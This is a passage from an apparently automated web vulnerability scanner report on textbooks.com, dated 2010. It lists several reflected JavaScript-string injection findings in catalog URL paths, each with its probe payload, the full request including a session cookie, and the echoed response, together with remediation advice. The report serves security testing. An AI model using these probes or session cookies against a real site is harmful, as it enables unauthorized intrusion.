Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/E/5082c';e6f007d707'

</script>
...[SNIP]...

1.16. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 681c1'%3b7e063a79ab9 was submitted in the REST URL parameter 1. This input was echoed as 681c1';7e063a79ab9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog681c1'%3b7e063a79ab9/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3651
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:17 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog681c1';7e063a79ab9/G/History-and-Geography.php'

</script>
...[SNIP]...

1.17. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53c0'%3b79c0a6f2e44 was submitted in the REST URL parameter 3. This input was echoed as c53c0';79c0a6f2e44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/G/c53c0'%3b79c0a6f2e44 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:18 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/G/c53c0';79c0a6f2e44'

</script>
...[SNIP]...

1.18. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a67'%3b6a580b3f371 was submitted in the REST URL parameter 1. This input was echoed as 50a67';6a580b3f371 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog50a67'%3b6a580b3f371/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3649
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:10 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog50a67';6a580b3f371/H/Arts-and-Humanities.php'

</script>
...[SNIP]...

1.19. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d9f8'%3b6cbc548cfc4 was submitted in the REST URL parameter 3. This input was echoed as 5d9f8';6cbc548cfc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/H/5d9f8'%3b6cbc548cfc4 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:11 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/H/5d9f8';6cbc548cfc4'

</script>
...[SNIP]...

1.20. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c22'%3b46f8934e7f2 was submitted in the REST URL parameter 1. This input was echoed as a6c22';46f8934e7f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Cataloga6c22'%3b46f8934e7f2/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3652
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Cataloga6c22';46f8934e7f2/HQL/General-Video-Titles.php'

</script>
...[SNIP]...

1.21. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a69fc'%3bf9ce83581d3 was submitted in the REST URL parameter 3. This input was echoed as a69fc';f9ce83581d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/HQL/a69fc'%3bf9ce83581d3 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
